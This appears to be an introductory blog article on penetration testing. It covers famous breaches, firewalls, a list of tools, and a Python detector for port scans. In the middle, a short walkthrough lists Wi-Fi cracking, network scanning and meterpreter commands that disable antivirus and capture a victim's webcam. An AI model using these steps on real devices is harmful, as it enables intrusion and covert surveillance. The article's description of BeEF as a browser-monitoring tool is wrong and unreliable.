It is a way of testing how vulnerable a system and its data are to attacks from external sources. The short form generally used for penetration testing is pen testing. It is a process in which companies hire ethical hackers to test and find vulnerabilities in their own systems. The cost of hiring such penetration testers varies greatly because there is no fixed measurement of the difficulty of this job.
Major Cyber Security Attacks in History.
- Adobe 2013 : A major hack affected Adobe's IT infrastructure, and personal information from around 2.9 million accounts was stolen.
- Sony 2011 : An attack on the PlayStation Network leaked the personal data of 77 million users.
- South Korea 2014 : Data from 100 million credit cards was stolen over the course of several years, and around 20 million bank accounts were hacked.
- Target 2013 : Ironically, Target was the target of a cyber security attack in which the data of 110 million customers was stolen.
- Alteryx : A mistake by the company left a database of sensitive information exposed and unsecured online in an AWS S3 storage cache.
What is a Firewall?
A firewall is the thing standing between a device and the external systems trying to communicate with it. A firewall is not a grumpy uncle keeping kids out of the orchard. It is more like a security guard who blocks unwanted connections but facilitates required connections.
Now let us see a simple example of penetrating a system through its Wi-Fi using BackTrack and aircrack-ng.
Please note that this is only an example of how easy it is to penetrate a system and get the camera feed, not a fully explained tutorial.
- Crack the Wi-Fi
  - bt > airmon-ng start wlan0
  - bt > airodump-ng mon0
- Enumerate with Netdiscover
  - bt > netdiscover -r 192.168.1.0/24
- Scan the Network
  - bt > nmap -sT 192.168.1.0/24
- Discover the Operating Systems
  - bt > xprobe2 192.168.1.103
  - bt > xprobe2 192.168.1.107
- Hack One of the Systems
- Turn on the Webcam
  - meterpreter > run killav.rb
  - meterpreter > webcam_snap
- You should be getting the camera feed of the victim device.
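Seen from the defending side, the `nmap -sT` sweep in the steps above is one of the easiest stages to catch, because a single source opens connections to many host and port pairs within seconds. The following Python detector is an added example, not part of the original walkthrough; the key=value log format, the addresses and the thresholds are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log format (constructed for this example, not a real product's):
#   <ISO timestamp> SRC=<ip> DST=<ip> PROTO=TCP DPT=<port> SYN
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP DPT=(?P<dpt>\d+) SYN$")

def make_sample_log():
    """Constructed traffic: one host sweeping the /24 and one ordinary client."""
    base, lines, n = datetime(2024, 1, 1, 10, 0, 0), [], 0
    for host in range(100, 120):            # 20 hosts x 3 ports, 100 ms apart
        for port in (22, 80, 445):
            ts = (base + timedelta(milliseconds=100 * n)).isoformat(timespec="milliseconds")
            lines.append(f"{ts} SRC=192.168.1.50 DST=192.168.1.{host} PROTO=TCP DPT={port} SYN")
            n += 1
    for i in range(30):                     # client reusing one server and port
        ts = (base + timedelta(seconds=2 * i)).isoformat(timespec="milliseconds")
        lines.append(f"{ts} SRC=192.168.1.77 DST=192.168.1.10 PROTO=TCP DPT=443 SYN")
    return sorted(lines)                    # fixed-width ISO timestamps sort by time

def find_scanners(lines, window_s=10, min_targets=15):
    """Map each source that reached min_targets distinct (dst, port) pairs
    within window_s seconds to the largest such count observed."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)             # src -> (ts, dst, port) still in window
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                        # skip lines in other formats
        ts, src = datetime.fromisoformat(m["ts"]), m["src"]
        q = recent[src]
        q.append((ts, m["dst"], int(m["dpt"])))
        while ts - q[0][0] > window:        # expire events older than the window
            q.popleft()
        targets = {(dst, port) for _, dst, port in q}
        if len(targets) >= min_targets:
            flagged[src] = max(flagged.get(src, 0), len(targets))
    return flagged

if __name__ == "__main__":
    for src, count in find_scanners(make_sample_log()).items():
        print(f"possible scan from {src}: {count} distinct host/port targets in 10 s")
```

The ordinary client makes 30 connections but only ever reaches one host and port, so counting distinct targets rather than raw connection volume keeps it from being flagged.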
Popular tools used in penetration testing
- Network Mapper (Nmap) : Free and open-source tool for network discovery (it allows a computer or a device to be visible to other systems) and security auditing (checking how well a system adheres to established criteria).
- Metasploit : Metasploit is basically a hacking tool that can be very dangerous in the wrong hands. It is used for carrying out various attacks, from sending malicious code to exploiting system weaknesses, while testing.
- BeEF : Solid command-line tool for monitoring the network’s ‘open door’ – the browser – for any unusual behaviour.
- Wireshark : A tool for analyzing network protocols.
- John the Ripper : Command-line tool for cracking passwords and testing how secure a user's password is.
Best penetration testing companies
- Red Security and their Red Team
- Secureworks Penetration Testing
- FireEye Penetration Testing
- Rapid7 Penetration Testing
- VeraCode Penetration Testing